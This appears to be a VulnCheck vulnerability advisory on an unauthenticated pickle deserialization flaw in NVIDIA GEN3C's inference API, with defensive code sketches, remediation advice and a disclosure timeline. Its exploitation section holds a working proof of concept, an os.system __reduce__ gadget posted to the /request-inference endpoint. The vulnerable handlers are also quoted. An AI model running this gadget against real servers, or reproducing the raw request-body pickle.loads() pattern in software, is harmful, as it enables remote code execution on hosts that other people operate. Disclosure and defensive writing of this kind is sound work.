NVIDIA GEN3C: Unauthenticated RCE via Pickle Deserialization in the Inference API

Summary

VulnCheck is disclosing CVE-2026-53805, a pickle deserialization vulnerability in NVIDIA GEN3C's inference API that allows for unauthenticated remote code execution. This one did not come from targeting GEN3C. It surfaced from a broad GitHub code search I run across public AI/ML projects for the trivial pattern of a raw HTTP request body passed straight to pickle.loads(); GEN3C was simply one of the hits. That such a search returns hits at all is the point.

GEN3C is NVIDIA's research project for 3D-consistent generation and editing of images and videos, built on a latent diffusion model with camera-controlled inference. It ships a GUI backed by a FastAPI inference server.

Two endpoints in that server, /request-inference and /seed-model, read the raw HTTP request body and pass it directly to pickle.loads(). There is no authentication, no input validation, and no restricted unpickler on either path. Any client that can reach the API port can run arbitrary code as the inference process (CWE-502).

VulnCheck is disclosing this vulnerability in accordance with its coordinated vulnerability disclosure policy.

Affected: all GEN3C revisions up to and including commit 04177ec. The project ships no tagged releases, so deployments are git checkouts of main. NVIDIA patched the deserialization path on main on 2026-06-15 (commit db2ffe1); any checkout from before that commit is still vulnerable.

Reachability and impact: The server listens on port 8000 by default, and the project documents reaching it over an SSH tunnel, so the realistic deployment is a remote GPU host on lab or cloud infrastructure. Anyone with network access to that port, including an attacker with a foothold on the same network, gets code execution with no credentials.

The vulnerability

The API server is gui/api/server.py, a FastAPI application. Two POST handlers take the raw HTTP request body and feed it to pickle. That is the entire bug.

/request-inference (server.py:106):

@app.post("/request-inference")
async def request_inference(request: Request):
    req: bytes = await request.body()
    req = pickle.loads(req)

/seed-model (server.py:130):

@app.post("/seed-model")
async def seed_model(request: Request):
    req: bytes = await request.body()
    req = pickle.loads(req)

pickle.loads() is pickle's general deserializer. A pickle stream can name any importable callable together with its arguments (this is what an object's __reduce__ method emits when it is pickled), and the unpickler calls that callable during deserialization, before the handler ever looks at the decoded object. It is the textbook unsafe-deserialization sink, the first line of every "do not do this in Python" checklist, here wired straight to an unauthenticated HTTP endpoint. Both handlers pass attacker-controlled bytes to it, and the app runs the stock Uvicorn config with no authentication middleware and no TLS.
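The mechanism can be shown with a harmless sketch. The names Marker and NoGlobalsUnpickler are hypothetical, the callable is the builtin len rather than anything dangerous, and the restricted unpickler follows the "Restricting Globals" pattern from the Python pickle documentation. It is an illustration of the missing control, not code from GEN3C before or after the fix.

```python
import io
import pickle


class Marker:
    """Hypothetical class whose pickle form asks the loader to call len()."""

    def __reduce__(self):
        # (callable, args): the unpickler will evaluate len("abc").
        return (len, ("abc",))


class NoGlobalsUnpickler(pickle.Unpickler):
    """Refuses every global lookup, so no callable can be resolved."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


payload = pickle.dumps(Marker())

# Plain pickle.loads() resolves len and calls it while decoding, so the
# caller receives the call's return value instead of a Marker instance.
result = pickle.loads(payload)

# The restricted unpickler rejects the same bytes before anything is called.
try:
    NoGlobalsUnpickler(io.BytesIO(payload)).load()
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

Here result is 3, the return value of len("abc"), which shows the call happened inside pickle.loads(). Blocking every global is stricter than most applications can tolerate; it is used here only to make the point that the stock loader applies no such filter.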

Exploitation

A single __reduce__ gadget is the whole exploit:

import pickle, os, requests

class RCE:
    def __reduce__(self):
        return (os.system, ("id > /tmp/gen3c_poc",))

requests.post("http://target:8000/request-inference",
              data=pickle.dumps(RCE()))

The command runs during pickle.loads(), before any inference logic. The server returns HTTP 202 ("accepted") and then errors on the unexpected object, but the code has already executed:

$ cat /tmp/gen3c_poc
uid=1000(gen3c) gid=1000(gen3c) groups=1000(gen3c)

Both endpoints are the same bug, copy-pasted.

Note on reproduction

The pickle.loads() call fires the moment the request body is read, ahead of any GPU work, so the vulnerable code path itself does not need a GPU. The server process does require CUDA to start, because it initializes the GEN3C pipeline at boot, so reproducing against a live instance needs an NVIDIA GPU. The vulnerability is confirmed by source review: the pattern is unambiguous (raw body into pickle.loads() with no auth) and the gadget executes before the pipeline is used.

Reachability and threat model

GEN3C is a research project deployed on GPU hardware. The README documents accessing the API through an SSH tunnel (ssh -NL 8000:localhost:8000), which confirms the default port (8000) and the typical deployment: a remote GPU server reached from a workstation.

No authentication. The endpoints authenticate nothing. Whoever reaches the port runs code as the inference process, commonly with access to the host's GPUs, the loaded models, and the data passing through them.
Internal network first. A LAN- or cluster-adjacent attacker, or one with an existing foothold, pivots to code execution on the GPU host with no credentials. The "trusted network" assumption is the only thing between the listener and an attacker.
Fingerprinting. The server returns the generic FastAPI 404 on GET /, so it is not trivially fingerprinted from a banner, but /openapi.json exposes the full schema including the two vulnerable routes.

Network reachability is the boundary here, and on shared lab or cloud GPU infrastructure that boundary is frequently weaker than assumed. Network-level access control is not authentication: once a host on the network is reachable, every unauthenticated service on it is exposed.
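For defenders inventorying their own hosts, the fingerprinting point above can be sketched as a check over a schema that has already been fetched from /openapi.json. The function name exposed_routes and the sample schema (including the /health path) are hypothetical. Route names alone do not say whether a checkout is patched, since a fixed server may expose the same paths; a hit only indicates that the host deserves a closer look.

```python
import json

# Routes named in this advisory as passing the raw body to pickle.loads().
VULNERABLE_ROUTES = {"/request-inference", "/seed-model"}


def exposed_routes(openapi_text):
    """Return the advisory's routes that appear as POST paths in a schema."""
    schema = json.loads(openapi_text)
    paths = schema.get("paths", {})
    return sorted(
        route for route in VULNERABLE_ROUTES
        if "post" in paths.get(route, {})
    )


# Hypothetical, hand-written schema fragment for illustration only.
sample_schema = json.dumps({
    "openapi": "3.1.0",
    "paths": {
        "/request-inference": {"post": {}},
        "/seed-model": {"post": {}},
        "/health": {"get": {}},
    },
})
found = exposed_routes(sample_schema)
```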

Impact

Successful exploitation is unauthenticated remote code execution as the inference process, and from there everything on the box: arbitrary code on the GPU host, the models loaded into it, the data flowing through inference, and a foothold to move laterally across the research or cloud environment. No credentials, no user interaction, one request. The GPU is the expensive part of the deployment; the code guarding it is one pickle.loads().

Remediation

NVIDIA fixed the issue on main on 2026-06-15 (commit db2ffe1, PR #63): the raw pickle.loads() path is replaced by a typed deserializer that enforces a content-type check and an allowed_types allowlist, so a request body can no longer carry an arbitrary pickle gadget. The project ships no tagged releases, so the fix reaches only deployments that pull the latest main; checkouts pinned before that commit stay vulnerable. VulnCheck's own upstream fix (nv-tlabs/GEN3C#62), opened earlier, was not merged and remains open. Operators should update to current main, and where that is not immediately possible, keep the API bound to localhost behind the documented SSH tunnel and not expose port 8000 to any untrusted network.
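The general shape of a typed, allowlisted decoder can be sketched as follows. This is not NVIDIA's implementation: the JSON wire format, the SeedRequest type, its seed field, and the decode_request function are all assumptions made for illustration. The point is only that the decoder can build nothing outside a fixed set of types.

```python
import json
from dataclasses import dataclass


@dataclass
class SeedRequest:
    """Hypothetical request type; the field name is illustrative."""
    seed: int

    def __post_init__(self):
        # Dataclasses do not enforce annotations, so check explicitly.
        if not isinstance(self.seed, int):
            raise TypeError("seed must be an integer")


# Allowlist mapping a wire-level type tag to the class it may build.
ALLOWED_TYPES = {"SeedRequest": SeedRequest}


def decode_request(content_type, body):
    """Decode a JSON body into an allowlisted type, or raise ValueError."""
    # Exact match for simplicity; real headers may carry parameters.
    if content_type != "application/json":
        raise ValueError(f"unsupported content type: {content_type!r}")
    try:
        doc = json.loads(body)
    except (json.JSONDecodeError, UnicodeDecodeError) as exc:
        raise ValueError("body is not valid JSON") from exc
    if not isinstance(doc, dict):
        raise ValueError("body must be a JSON object")
    type_tag = doc.get("type")
    if not isinstance(type_tag, str) or type_tag not in ALLOWED_TYPES:
        raise ValueError("request type is not in the allowlist")
    fields = doc.get("fields")
    if not isinstance(fields, dict):
        raise ValueError("fields must be a JSON object")
    try:
        return ALLOWED_TYPES[type_tag](**fields)
    except TypeError as exc:
        raise ValueError("fields do not match the request type") from exc


ok = decode_request(
    "application/json",
    b'{"type": "SeedRequest", "fields": {"seed": 7}}',
)
```

A pickle payload sent to this decoder fails at the content-type check or at JSON parsing, and a well-formed body that names any other type is rejected by the allowlist lookup.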

Timeline

Date	Event
2026-02-10	Vulnerability reported to VulnCheck; CVE requested via the VulnCheck CNA
2026-02-11	VulnCheck initiated coordinated disclosure outreach to the NVIDIA PSIRT (120-day deadline: 2026-06-11)
2026-02-12	NVIDIA PSIRT acknowledged the report
2026-02-13	VulnCheck followed up and notified NVIDIA that the researcher intended to publish a technical report
2026-03-18	VulnCheck requested an update
2026-04-23	VulnCheck requested an update
2026-04-23	NVIDIA indicated the fix was still in progress
2026-05-12	VulnCheck requested an update
2026-06-09	VulnCheck requested a final update and indicated its intent to disclose on or after 2026-06-11
2026-06-11	VulnCheck submitted a fix upstream (PR #62), replacing pickle with safetensors
2026-06-11	120-day coordinated-disclosure deadline reached, no patch released
2026-06-15	NVIDIA quietly merged its own fix into main (PR #63, commit db2ffe1), leaving VulnCheck's PR #62 open
2026-06-23	This disclosure

NVIDIA acknowledged the report and indicated a fix was in progress, but nothing landed within the 120-day coordinated-disclosure window. Four days after the deadline, on 2026-06-15, NVIDIA merged its own fix (PR #63) into main without notifying VulnCheck and without merging the patch VulnCheck had proposed in PR #62, which is still open. The fix replaces the unsafe pickle.loads() path with a typed, allowlisted deserializer; the project still ships no tagged release carrying it. Disclosure proceeds per VulnCheck's coordinated disclosure policy.

Takeaways

I did not single out GEN3C: it surfaced from a broad GitHub code search for the literal pattern of an HTTP request body passed straight to pickle.loads(), and that such a search returns hits at all is the lesson.
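The search itself was a GitHub code search, which is not reproduced here. A local analogue for auditing a codebase you own can be sketched with Python's ast module. The function name find_pickle_loads is hypothetical, and the check is deliberately narrow: it flags direct pickle.loads(...) calls only, misses aliased imports such as "from pickle import loads", and does not track whether the argument is a request body.

```python
import ast


def find_pickle_loads(source):
    """Return line numbers of direct pickle.loads(...) calls in source."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if (
            isinstance(func, ast.Attribute)
            and func.attr == "loads"
            and isinstance(func.value, ast.Name)
            and func.value.id == "pickle"
        ):
            hits.append(node.lineno)
    return sorted(hits)


# Sample mirrors the handler shape quoted in this advisory.
handler_source = '''
@app.post("/request-inference")
async def request_inference(request: Request):
    req: bytes = await request.body()
    req = pickle.loads(req)
'''
lines = find_pickle_loads(handler_source)
```

Each hit still needs manual review to decide whether the bytes reaching pickle.loads() are attacker-controlled.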

The bug is the most basic deserialization pattern: an HTTP request body passed directly to pickle.loads() with no authentication. It is a recurring shape in ML/AI tooling, where inference servers expose RPC-style endpoints on GPU hosts and treat the network boundary as sufficient protection. The cost of that assumption is unauthenticated code execution: the moment the listener is reachable by anyone it was not meant to be, a single request is enough. The main branch is now patched, but with no tagged release the fix only reaches deployments that pull it, so operators running GEN3C should update to current main or keep the API bound to localhost behind the documented SSH tunnel and avoid exposing port 8000 to any untrusted network.
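As a small guard for the localhost-only workaround, a launcher script could refuse to start when the configured bind address is not loopback. The sketch below is an assumption about how an operator might wire such a check; is_loopback_bind is a hypothetical helper and is not part of GEN3C, FastAPI, or Uvicorn.

```python
import ipaddress


def is_loopback_bind(host):
    """Return True if a bind address only accepts local connections."""
    # Assumes "localhost" resolves to a loopback address on this host.
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Other hostnames cannot be judged here, so treat them as exposed.
        return False


local_only = is_loopback_bind("127.0.0.1")
wildcard = is_loopback_bind("0.0.0.0")
```

A wildcard address such as 0.0.0.0 or :: fails the check, which is the case the SSH tunnel workflow is meant to avoid.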

About VulnCheck

VulnCheck empowers organizations to transcend the challenges of vulnerability prioritization. Our suite of solutions provides product managers, PSIRT teams, and threat hunters with the tools required for accelerated, high-precision operations and infinite efficiency.

Recognizing the industry-wide necessity for superior data velocity and accuracy, we deliver high-fidelity insights to the market. We remain committed to surfacing critical intelligence on vulnerability exploitation and emerging trends, leveraging our unique dataset to support the practitioner community.

To deepen your understanding of these threats, VulnCheck Exploit & Vulnerability Intelligence provides comprehensive coverage of global threat actors. Register for a demo to explore our intelligence today.
